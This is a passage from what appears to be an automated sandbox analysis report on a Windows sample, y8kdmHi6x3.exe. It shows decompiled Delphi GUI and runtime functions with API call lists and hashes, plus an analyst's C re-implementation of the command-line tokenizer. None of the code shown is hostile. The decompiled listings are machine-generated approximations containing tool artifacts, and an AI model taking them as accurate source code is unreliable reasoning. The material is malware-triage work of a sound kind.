                                                    						DrawEdge(_v16,  &_v48,  *(0x49bcec + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x49bcfc + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x49bd0c + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x49bd1c + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
                                                    					}
                                                    					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
                                                    					FillRect(_v16,  &_v48, E00425610( *((intOrPtr*)(_v8 + 0x170))));
                                                    					_pop(_t218);
                                                    					 *[fs:eax] = _t218;
                                                    					_push(0x442765);
                                                    					return ReleaseDC(E00441704(_v8), _v16);
                                                    				} else {
                                                    					 *((intOrPtr*)( *_v8 - 0x10))();
                                                    					_t207 = E004329D8(E004328F8());
                                                    					if(_t207 != 0) {
                                                    						_t207 = _v8;
                                                    						if(( *(_t207 + 0x52) & 0x00000002) != 0) {
                                                    							_t207 = E00432F08(E004328F8(), 0, _v8);
                                                    						}
                                                    					}
                                                    					return _t207;
                                                    				}
                                                    			}

                                                    APIs
                                                    • GetWindowDC.USER32(00000000), ref: 0044252C
                                                    • GetClientRect.USER32 ref: 0044254F
                                                    • GetWindowRect.USER32 ref: 00442561
                                                    • MapWindowPoints.USER32 ref: 00442577
                                                    • OffsetRect.USER32(?,?,?), ref: 0044258C
                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 004425A5
                                                    • InflateRect.USER32(?,00000000,00000000), ref: 004425C3
                                                    • GetWindowLongA.USER32 ref: 00442619
                                                    • DrawEdge.USER32(?,?,00000000,00000008), ref: 004426E5
                                                    • IntersectClipRect.GDI32(?,?,?,?,?), ref: 004426FE
                                                    • OffsetRect.USER32(?,?,?), ref: 0044271D
                                                    • FillRect.USER32 ref: 00442739
                                                    • ReleaseDC.USER32 ref: 00442758
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$Window$ClipOffset$ClientDrawEdgeExcludeFillInflateIntersectLongPointsRelease
                                                    • String ID:
                                                    • API String ID: 3115931838-0
                                                    • Opcode ID: c56058a07da977805be350d555e5f4c2bc4b18feb5411abbc630dda1f5db6ba1
                                                    • Instruction ID: af5f50b217af5c554848a1b825971ec4031c124bbe34cabe8649f27ab7cee0d4
                                                    • Opcode Fuzzy Hash: c56058a07da977805be350d555e5f4c2bc4b18feb5411abbc630dda1f5db6ba1
                                                    • Instruction Fuzzy Hash: 48911771E04208AFDB01DBA9C985EEEB7F9AF09314F5440A6F504F7252C779AE40DB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 59%
                                                    			E00432F08(void* __eax, void* __ecx, intOrPtr __edx) {
                                                    				intOrPtr _v8;
                                                    				struct HDC__* _v12;
                                                    				struct tagRECT _v28;
                                                    				struct tagRECT _v44;
                                                    				char _v56;
                                                    				char _v72;
                                                    				signed char _t43;
                                                    				signed int _t79;
                                                    				int _t81;
                                                    				void* _t94;
                                                    				intOrPtr _t107;
                                                    				void* _t116;
                                                    				void* _t119;
                                                    				void* _t122;
                                                    				void* _t124;
                                                    				intOrPtr _t125;
                                                    
                                                    				_t122 = _t124;
                                                    				_t125 = _t124 + 0xffffffbc;
                                                    				_t94 = __ecx;
                                                    				_v8 = __edx;
                                                    				_t116 = __eax;
                                                    				_t43 = GetWindowLongA(E00441704(_v8), 0xffffffec);
                                                    				if((_t43 & 0x00000002) == 0) {
                                                    					return _t43;
                                                    				} else {
                                                    					GetWindowRect(E00441704(_v8),  &_v44);
                                                    					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
                                                    					_v12 = GetWindowDC(E00441704(_v8));
                                                    					_push(_t122);
                                                    					_push(0x433063);
                                                    					_push( *[fs:edx]);
                                                    					 *[fs:edx] = _t125;
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					_t119 = _t116;
                                                    					if(_t94 != 0) {
                                                    						_t79 = GetWindowLongA(E00441704(_v8), 0xfffffff0);
                                                    						if((_t79 & 0x00100000) != 0 && (_t79 & 0x00200000) != 0) {
                                                    							GetSystemMetrics(2);
                                                    							_t81 = GetSystemMetrics(3);
                                                    							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
                                                    							E00419804(_v28.right, _v28.bottom - _t81,  &_v72, _v28.bottom);
                                                    							asm("movsd");
                                                    							asm("movsd");
                                                    							asm("movsd");
                                                    							asm("movsd");
                                                    							_t119 = _t119;
                                                    							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
                                                    						}
                                                    					}
                                                    					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
                                                    					E00432B40( &_v56, 2);
                                                    					E00432A94(_t119,  &_v56, _v12, 0,  &_v44);
                                                    					_pop(_t107);
                                                    					 *[fs:eax] = _t107;
                                                    					_push(0x43306a);
                                                    					return ReleaseDC(E00441704(_v8), _v12);
                                                    				}
                                                    			}

                                                    APIs
                                                    • GetWindowLongA.USER32 ref: 00432F23
                                                    • GetWindowRect.USER32 ref: 00432F3E
                                                    • OffsetRect.USER32(?,?,?), ref: 00432F53
                                                    • GetWindowDC.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00432F61
                                                    • GetWindowLongA.USER32 ref: 00432F92
                                                    • GetSystemMetrics.USER32 ref: 00432FA7
                                                    • GetSystemMetrics.USER32 ref: 00432FB0
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00432FBF
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00432FEC
                                                    • FillRect.USER32 ref: 00432FFA
                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00433063,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0043301F
                                                    • ReleaseDC.USER32 ref: 0043305D
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
                                                    • String ID:
                                                    • API String ID: 19621357-0
                                                    • Opcode ID: 1044420493868e0b4b43c14135ea523b993d5beeeaccf79545e6cca688bac7b0
                                                    • Instruction ID: 04c1fd49532e7d442bf35e743343acee4fdea8649fd85b2f3a22c1a56fe95c6f
                                                    • Opcode Fuzzy Hash: 1044420493868e0b4b43c14135ea523b993d5beeeaccf79545e6cca688bac7b0
                                                    • Instruction Fuzzy Hash: A9415E71E04108ABDB01EAE9CD82EDFB7BDEF49364F100126F904F7291CA78AE418765
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 88%
                                                    			E0042CAA8(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
                                                    				struct tagPOINT _v12;
                                                    				int _v16;
                                                    				struct tagRECT _v32;
                                                    				struct tagRECT _v48;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				void* _t60;
                                                    				int _t61;
                                                    				RECT* _t64;
                                                    				struct HDC__* _t65;
                                                    
                                                    				_t64 = _a8;
                                                    				_t65 = _a4;
                                                    				if( *0x49e92f != 0) {
                                                    					_t61 = 0;
                                                    					if(_a12 == 0) {
                                                    						L14:
                                                    						return _t61;
                                                    					}
                                                    					_v32.left = 0;
                                                    					_v32.top = 0;
                                                    					_v32.right = GetSystemMetrics(0);
                                                    					_v32.bottom = GetSystemMetrics(1);
                                                    					if(_t65 == 0) {
                                                    						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                                    							L13:
                                                    							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
                                                    						} else {
                                                    							_t61 = 1;
                                                    						}
                                                    						goto L14;
                                                    					}
                                                    					_v16 = GetClipBox(_t65,  &_v48);
                                                    					if(GetDCOrgEx(_t65,  &_v12) == 0) {
                                                    						goto L14;
                                                    					}
                                                    					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
                                                    					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
                                                    						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
                                                    							goto L13;
                                                    						}
                                                    						if(_v16 == 1) {
                                                    							_t61 = 1;
                                                    						}
                                                    						goto L14;
                                                    					} else {
                                                    						goto L13;
                                                    					}
                                                    				}
                                                    				 *0x49e91c = E0042C4FC(7, _t60,  *0x49e91c, _t64, _t65);
                                                    				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
                                                    				goto L14;
                                                    			}

                                                    APIs
                                                    • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0042CAE1
                                                    • GetSystemMetrics.USER32 ref: 0042CB06
                                                    • GetSystemMetrics.USER32 ref: 0042CB11
                                                    • GetClipBox.GDI32(?,?), ref: 0042CB23
                                                    • GetDCOrgEx.GDI32(?,?), ref: 0042CB30
                                                    • OffsetRect.USER32(?,?,?), ref: 0042CB49
                                                    • IntersectRect.USER32 ref: 0042CB5A
                                                    • IntersectRect.USER32 ref: 0042CB70
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                    • String ID: EnumDisplayMonitors
                                                    • API String ID: 362875416-2491903729
                                                    • Opcode ID: 791a3b08cf1bf35bfa2ae10ab843e66c4762703426140a8de13650c17db2e41e
                                                    • Instruction ID: 4511490224432de624573bc09b14fa9d255139f998f9dfe8687c617b2a51fe57
                                                    • Opcode Fuzzy Hash: 791a3b08cf1bf35bfa2ae10ab843e66c4762703426140a8de13650c17db2e41e
                                                    • Instruction Fuzzy Hash: 723101B2E04219AFDB50DFA5E885EFF77BCAB05300F444537ED15E3241D638AA018BA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00402A1C(CHAR* __eax, intOrPtr* __edx) {
                                                    				char _t5;
                                                    				char _t6;
                                                    				CHAR* _t7;
                                                    				char _t9;
                                                    				CHAR* _t11;
                                                    				char _t14;
                                                    				CHAR* _t15;
                                                    				char _t17;
                                                    				CHAR* _t19;
                                                    				CHAR* _t22;
                                                    				CHAR* _t23;
                                                    				CHAR* _t32;
                                                    				intOrPtr _t33;
                                                    				intOrPtr* _t34;
                                                    				void* _t35;
                                                    				void* _t36;
                                                    
                                                    				_t34 = __edx;
                                                    				_t22 = __eax;
                                                    				while(1) {
                                                    					L2:
                                                    					_t5 =  *_t22;
                                                    					if(_t5 != 0 && _t5 <= 0x20) {
                                                    						_t22 = CharNextA(_t22);
                                                    					}
                                                    					L2:
                                                    					_t5 =  *_t22;
                                                    					if(_t5 != 0 && _t5 <= 0x20) {
                                                    						_t22 = CharNextA(_t22);
                                                    					}
                                                    					L4:
                                                    					if( *_t22 != 0x22 || _t22[1] != 0x22) {
                                                    						_t36 = 0;
                                                    						_t32 = _t22;
                                                    						while(1) {
                                                    							_t6 =  *_t22;
                                                    							if(_t6 <= 0x20) {
                                                    								break;
                                                    							}
                                                    							if(_t6 != 0x22) {
                                                    								_t7 = CharNextA(_t22);
                                                    								_t36 = _t36 + _t7 - _t22;
                                                    								_t22 = _t7;
                                                    								continue;
                                                    							}
                                                    							_t22 = CharNextA(_t22);
                                                    							while(1) {
                                                    								_t9 =  *_t22;
                                                    								if(_t9 == 0 || _t9 == 0x22) {
                                                    									break;
                                                    								}
                                                    								_t11 = CharNextA(_t22);
                                                    								_t36 = _t36 + _t11 - _t22;
                                                    								_t22 = _t11;
                                                    							}
                                                    							if( *_t22 != 0) {
                                                    								_t22 = CharNextA(_t22);
                                                    							}
                                                    						}
                                                    						E0040500C(_t34, _t36);
                                                    						_t23 = _t32;
                                                    						_t33 =  *_t34;
                                                    						_t35 = 0;
                                                    						while(1) {
                                                    							_t14 =  *_t23;
                                                    							if(_t14 <= 0x20) {
                                                    								break;
                                                    							}
                                                    							if(_t14 != 0x22) {
                                                    								_t15 = CharNextA(_t23);
                                                    								if(_t15 <= _t23) {
                                                    									continue;
                                                    								} else {
                                                    									goto L27;
                                                    								}
                                                    								do {
                                                    									L27:
                                                    									 *((char*)(_t33 + _t35)) =  *_t23;
                                                    									_t23 =  &(_t23[1]);
                                                    									_t35 = _t35 + 1;
                                                    								} while (_t15 > _t23);
                                                    								continue;
                                                    							}
                                                    							_t23 = CharNextA(_t23);
                                                    							while(1) {
                                                    								_t17 =  *_t23;
                                                    								if(_t17 == 0 || _t17 == 0x22) {
                                                    									break;
                                                    								}
                                                    								_t19 = CharNextA(_t23);
                                                    								if(_t19 <= _t23) {
                                                    									continue;
                                                    								} else {
                                                    									goto L21;
                                                    								}
                                                    								do {
                                                    									L21:
                                                    									 *((char*)(_t33 + _t35)) =  *_t23;
                                                    									_t23 =  &(_t23[1]);
                                                    									_t35 = _t35 + 1;
                                                    								} while (_t19 > _t23);
                                                    							}
                                                    							if( *_t23 != 0) {
                                                    								_t23 = CharNextA(_t23);
                                                    							}
                                                    						}
                                                    						return _t23;
                                                    					} else {
                                                    						_t22 =  &(_t22[2]);
                                                    						continue;
                                                    					}
                                                    				}
                                                    			}

                                                    Listing addresses (per-line address column collapsed): 0x00402a20 to 0x00402b05; the APIs list below gives the address of each call

                                                    APIs
                                                    • CharNextA.USER32(00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A53
                                                    • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A5D
                                                    • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A7A
                                                    • CharNextA.USER32(00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A84
                                                    • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402AAD
                                                    • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402AB7
                                                    • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402ADB
                                                    • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402AE5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CharNext
                                                    • String ID: "$"
                                                    • API String ID: 3213498283-3758156766
                                                    • Opcode ID: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                    • Instruction ID: 7f4eabc370d0c2b1a65279813ceea620399496a62879659d683f8910f88fef49
                                                    • Opcode Fuzzy Hash: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                    • Instruction Fuzzy Hash: 3621E5447443D21ADF7169B90EC83A76B894B5A31872804BB9582B63CBDCFC48479B6E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
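
                                                    Analyst note on the listing above (E00402A1C): this is not sample-specific logic but the Delphi RTL command-line tokenizer System.GetParamStr, recognisable from the CharNextA stepping, the 0x20 separator threshold, the 0x22 quote handling and the count-then-copy structure around E0040500C, which sizes the output string before the copy pass. The C re-implementation below is an added example written for this report, not code recovered from y8kdmHi6x3.exe. It shows what a Delphi binary receives in ParamStr(n) for a given command line, including the cases a mis-quoted launch produces: a "" pair in separator position is skipped, a quote may open in the middle of a token, and an unterminated quote swallows the rest of the line. The single-byte char_next stand-in for CharNextA, the unsigned byte comparison and the constructed command line in main are assumptions of the example. The next function in this listing, E00457244, is likewise framework code: the WM_CANCELMODE (0x1F) send to the capture window, the 0xB000/0xB001 messages (VCL CM_ACTIVATE/CM_DEACTIVATE) and the modal loop that sets the result to 2 (mrCancel) when the application terminates match TCustomForm.ShowModal.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for USER32!CharNextA on single-byte input: the sample calls
 * CharNextA so DBCS lead/trail pairs are stepped over as one character;
 * for ASCII input advancing one byte is equivalent (assumption of this
 * example). Neither advances past the terminating NUL. */
static const char *char_next(const char *p)
{
    return (*p != '\0') ? p + 1 : p;
}

/* Same semantics as the decompiled routine (Delphi RTL GetParamStr):
 * bytes <= 0x20 separate parameters, a "" pair in separator position is
 * skipped, a double quote starts a run copied verbatim (spaces included)
 * up to the closing quote, and both quotes are dropped. A quote may
 * begin inside a token, so "a b"c yields the single parameter a bc.
 * Returns a pointer just past the parameter; the parameter is written
 * NUL-terminated into out, truncated to cap-1 bytes. The original counts
 * first and then copies into a freshly sized Delphi string; with a
 * caller buffer one pass suffices. Byte comparisons are unsigned, as
 * Delphi Char comparisons are (assumed; the decompiler's `char` type
 * does not settle signedness). */
const char *get_param_str(const char *p, char *out, size_t cap)
{
    size_t n = 0;

    for (;;) {                                  /* the L2/L4 loop */
        while (*p != '\0' && (unsigned char)*p <= 0x20)
            p = char_next(p);
        if (p[0] == '"' && p[1] == '"')
            p += 2;
        else
            break;
    }
    while ((unsigned char)*p > 0x20) {
        if (*p == '"') {
            p = char_next(p);                   /* drop opening quote */
            while (*p != '\0' && *p != '"') {
                const char *q = char_next(p);
                for (; p < q; p++)              /* copy one character */
                    if (n + 1 < cap) out[n++] = *p;
            }
            if (*p != '\0')
                p = char_next(p);               /* drop closing quote */
        } else {
            const char *q = char_next(p);
            for (; p < q; p++)
                if (n + 1 < cap) out[n++] = *p;
        }
    }
    if (cap > 0)
        out[n] = '\0';
    return p;
}

/* Split a whole command line; token i corresponds to Delphi ParamStr(i)
 * for i >= 1 (token 0 is the program path). Like Delphi's ParamCount it
 * stops at the first empty result, which this tokenizer returns only
 * once nothing but separators and "" pairs remain. */
int split_params(const char *cmdline, char params[][64], int max_params)
{
    int count = 0;
    const char *p = cmdline;

    while (count < max_params) {
        char tmp[64];
        p = get_param_str(p, tmp, sizeof tmp);
        if (tmp[0] == '\0')
            break;
        strcpy(params[count++], tmp);
    }
    return count;
}

/* Helpers that return checkable values for a command line. */
int count_params(const char *cmdline)
{
    char params[16][64];
    return split_params(cmdline, params, 16);
}

int nth_param_is(const char *cmdline, int idx, const char *expected)
{
    char params[16][64];
    int n = split_params(cmdline, params, 16);
    return idx >= 0 && idx < n && strcmp(params[idx], expected) == 0;
}

int main(void)
{
    /* Constructed command line, not taken from the report. */
    const char *cmdline = "\"\" \"C:\\Users\\x\\y8kdmHi6x3.exe\"\t-i \"a b\"c d";
    char params[16][64];
    int n = split_params(cmdline, params, 16);

    for (int i = 0; i < n; i++)
        printf("token %d = [%s]\n", i, params[i]);
    return 0;
}
```

                                                    Feed it the command line exactly as the process tree records it for the relevant process to see which ParamStr(n) values the binary compares against; a re-launch whose argument carries an unbalanced quote, for example, arrives as one parameter containing the rest of the line rather than as several.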

                                                    C-Code - Quality: 72%
                                                    			E00457244(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                    				intOrPtr* _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr _v16;
                                                    				intOrPtr _v20;
                                                    				short _v22;
                                                    				intOrPtr _v28;
                                                    				struct HWND__* _v32;
                                                    				char _v36;
                                                    				intOrPtr _t50;
                                                    				intOrPtr _t56;
                                                    				intOrPtr _t60;
                                                    				intOrPtr _t61;
                                                    				intOrPtr _t62;
                                                    				intOrPtr _t65;
                                                    				intOrPtr _t66;
                                                    				intOrPtr _t68;
                                                    				intOrPtr _t70;
                                                    				intOrPtr _t80;
                                                    				intOrPtr _t82;
                                                    				intOrPtr _t85;
                                                    				void* _t90;
                                                    				intOrPtr _t122;
                                                    				void* _t124;
                                                    				void* _t127;
                                                    				void* _t128;
                                                    				intOrPtr _t129;
                                                    
                                                    				_t125 = __esi;
                                                    				_t124 = __edi;
                                                    				_t105 = __ebx;
                                                    				_t127 = _t128;
                                                    				_t129 = _t128 + 0xffffffe0;
                                                    				_push(__ebx);
                                                    				_push(__esi);
                                                    				_v36 = 0;
                                                    				_v8 = __eax;
                                                    				_push(_t127);
                                                    				_push(0x45750c);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t129;
                                                    				E004397DC();
                                                    				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
                                                    					_t50 =  *0x49da70; // 0x422f48
                                                    					E00406A70(_t50,  &_v36);
                                                    					E0040D144(_v36, 1);
                                                    					E00404378();
                                                    				}
                                                    				if(GetCapture() != 0) {
                                                    					SendMessageA(GetCapture(), 0x1f, 0, 0);
                                                    				}
                                                    				ReleaseCapture();
                                                    				_t56 =  *0x49ebb8; // 0x0
                                                    				E004596E4(_t56);
                                                    				_push(_t127);
                                                    				_push(0x4574ef);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t129;
                                                    				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
                                                    				_v32 = GetActiveWindow();
                                                    				_t60 =  *0x49be70; // 0x0
                                                    				_v20 = _t60;
                                                    				_t61 =  *0x49ebbc; // 0x0
                                                    				_t62 =  *0x49ebbc; // 0x0
                                                    				E0041ACE8( *((intOrPtr*)(_t62 + 0x7c)),  *((intOrPtr*)(_t61 + 0x78)), 0);
                                                    				_t65 =  *0x49ebbc; // 0x0
                                                    				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
                                                    				_t66 =  *0x49ebbc; // 0x0
                                                    				_v22 =  *((intOrPtr*)(_t66 + 0x44));
                                                    				_t68 =  *0x49ebbc; // 0x0
                                                    				E00458714(_t68,  *((intOrPtr*)(_t61 + 0x78)), 0);
                                                    				_t70 =  *0x49ebbc; // 0x0
                                                    				_v28 =  *((intOrPtr*)(_t70 + 0x48));
                                                    				_v16 = E00451600(0, _t105, _t124, _t125);
                                                    				_push(_t127);
                                                    				_push(0x4574cd);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t129;
                                                    				E00457194(_v8);
                                                    				_push(_t127);
                                                    				_push(0x45742c);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t129;
                                                    				SendMessageA(E00441704(_v8), 0xb000, 0, 0);
                                                    				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
                                                    				do {
                                                    					_t80 =  *0x49ebb8; // 0x0
                                                    					E0045A580(_t80, _t124, _t125);
                                                    					_t82 =  *0x49ebb8; // 0x0
                                                    					if( *((char*)(_t82 + 0x9c)) == 0) {
                                                    						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
                                                    							E004570F4(_v8);
                                                    						}
                                                    					} else {
                                                    						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
                                                    					}
                                                    					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
                                                    				} while (_t85 == 0);
                                                    				_v12 = _t85;
                                                    				SendMessageA(E00441704(_v8), 0xb001, 0, 0);
                                                    				_t90 = E00441704(_v8);
                                                    				if(_t90 != GetActiveWindow()) {
                                                    					_v32 = 0;
                                                    				}
                                                    				_pop(_t122);
                                                    				 *[fs:eax] = _t122;
                                                    				_push(0x457433);
                                                    				return E0045718C();
                                                    			}

                                                    Listing addresses (per-line address column collapsed): 0x00457244 to 0x0045742b; the APIs list below gives the address of each call

                                                    APIs
                                                    • GetCapture.USER32 ref: 004572B5
                                                    • GetCapture.USER32 ref: 004572C4
                                                    • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004572CA
                                                    • ReleaseCapture.USER32(00000000,0045750C), ref: 004572CF
                                                    • GetActiveWindow.USER32 ref: 004572F6
                                                    • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 0045738C
                                                    • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 004573F9
                                                    • GetActiveWindow.USER32 ref: 00457408
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CaptureMessageSend$ActiveWindow$Release
                                                    • String ID: H/B
                                                    • API String ID: 862346643-184950203
                                                    • Opcode ID: c132ccbc1d8843ba1326dfc613755e208ed03b4cb6e87a844a7b76971916ced5
                                                    • Instruction ID: 07b1c62a38d4c59f35ab2a161c95611ba83c65b292c9824363ed57e20a3288b5
                                                    • Opcode Fuzzy Hash: c132ccbc1d8843ba1326dfc613755e208ed03b4cb6e87a844a7b76971916ced5
                                                    • Instruction Fuzzy Hash: 19512E34A04244EFDB10EF6AD946F9A77F1EB49704F1580BAF800A73A2D778AD44DB49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0043F510(void* __eax, void* __ecx, struct HDC__* __edx) {
                                                    				struct tagRECT _v44;
                                                    				struct tagRECT _v60;
                                                    				void* _v68;
                                                    				int _v80;
                                                    				int _t79;
                                                    				void* _t134;
                                                    				int _t135;
                                                    				void* _t136;
                                                    				void* _t159;
                                                    				void* _t160;
                                                    				void* _t161;
                                                    				struct HDC__* _t162;
                                                    				intOrPtr* _t163;
                                                    
                                                    				_t163 =  &(_v44.bottom);
                                                    				_t134 = __ecx;
                                                    				_t162 = __edx;
                                                    				_t161 = __eax;
                                                    				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
                                                    					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
                                                    				}
                                                    				_t78 =  *((intOrPtr*)(_t161 + 0x198));
                                                    				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
                                                    					L17:
                                                    					_t79 =  *(_t161 + 0x19c);
                                                    					if(_t79 == 0) {
                                                    						L27:
                                                    						return _t79;
                                                    					}
                                                    					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
                                                    					if(_t79 < 0) {
                                                    						goto L27;
                                                    					}
                                                    					_v44.right = _t79 + 1;
                                                    					_t159 = 0;
                                                    					do {
                                                    						_t79 = E0041AC6C( *(_t161 + 0x19c), _t159);
                                                    						_t135 = _t79;
                                                    						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
                                                    							_v44.left = CreateSolidBrush(E00424950(0xff000010));
                                                    							E00419804( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
                                                    							FrameRect(_t162,  &_v44, _v44);
                                                    							DeleteObject(_v60.right);
                                                    							_v60.left = CreateSolidBrush(E00424950(0xff000014));
                                                    							E00419804( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
                                                    							FrameRect(_t162,  &_v60, _v60);
                                                    							_t79 = DeleteObject(_v68);
                                                    						}
                                                    						_t159 = _t159 + 1;
                                                    						_t75 =  &(_v44.right);
                                                    						 *_t75 = _v44.right - 1;
                                                    					} while ( *_t75 != 0);
                                                    					goto L27;
                                                    				}
                                                    				_t160 = 0;
                                                    				if(_t134 != 0) {
                                                    					_t160 = E0041ACC8(_t78, _t134);
                                                    					if(_t160 < 0) {
                                                    						_t160 = 0;
                                                    					}
                                                    				}
                                                    				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
                                                    				if(_t160 <  *_t163) {
                                                    					do {
                                                    						_t136 = E0041AC6C( *((intOrPtr*)(_t161 + 0x198)), _t160);
